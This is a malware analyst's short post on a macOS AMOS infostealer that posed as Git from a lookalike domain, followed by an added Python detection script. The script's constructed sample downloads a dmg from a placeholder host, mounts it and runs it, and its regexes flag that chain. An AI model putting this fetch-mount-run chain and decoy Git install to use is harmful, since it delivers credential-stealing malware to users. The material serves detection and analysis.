Bhargav Rathod

@malwr4n6

Published: March 20, 2025

Happened to analyze a suspicious macOS file. A developer downloaded Git from a git lookalike domain. Turns out to be #AMOS :) Thanks to @obje tool Lulu @patrickwardle. Check out more in the thread. #macos #malwareanalysis #malware #infostealer

Turns out this bash script downloads a dmg file, mounts it, executes it and then installs legit git via homebrew! Nice trick to fool a user 😈
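
The chain described in the thread (download a dmg, mount it, run something from the mounted volume, then install the real Git via Homebrew) can be checked for during script triage. This is an added example, not part of the original thread or the analyzed sample; the sample scripts, the `example.invalid` host, the file names and the regexes are constructed assumptions.

```python
import re

# Stages of the chain described in the thread, in the order they occur.
# The patterns are illustrative assumptions, not signatures from the real sample.
STAGES = [
    ("download_dmg", re.compile(r"\b(curl|wget)\b.*\.dmg\b")),
    ("mount_dmg", re.compile(r"\bhdiutil\s+(attach|mount)\b")),
    ("run_from_volume", re.compile(r"(^|[;&|]\s*)(open\s+|sudo\s+)?[\"']?/Volumes/")),
    ("install_real_git", re.compile(r"\bbrew\s+install\b.*\bgit\b")),
]


def find_chain(script_text):
    """Return [(stage, line_no, line)] when every stage occurs in order, else []."""
    hits, stage_idx = [], 0
    for line_no, raw in enumerate(script_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines, comments and the shebang
        # One line may satisfy several consecutive stages (cmd1 && cmd2).
        while stage_idx < len(STAGES) and STAGES[stage_idx][1].search(line):
            hits.append((STAGES[stage_idx][0], line_no, line))
            stage_idx += 1
    return hits if stage_idx == len(STAGES) else []


# Constructed sample with placeholder host and paths.
SAMPLE = """#!/bin/bash
# constructed sample for testing the check
curl -sL -o /tmp/pkg.dmg https://git-mirror.example.invalid/pkg.dmg
hdiutil attach /tmp/pkg.dmg
/Volumes/pkg/installer
brew install git
"""

# Constructed benign script: a plain Homebrew install must not be flagged.
BENIGN = """#!/bin/bash
brew update
brew install git
"""

if __name__ == "__main__":
    for stage, line_no, line in find_chain(SAMPLE):
        print(f"{stage:18} line {line_no}: {line}")
    print("benign flagged:", bool(find_chain(BENIGN)))
```

The final `brew install git` stage is what separates this pattern from an ordinary dmg installer script: the victim ends up with a working Git, so nothing looks wrong afterwards.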
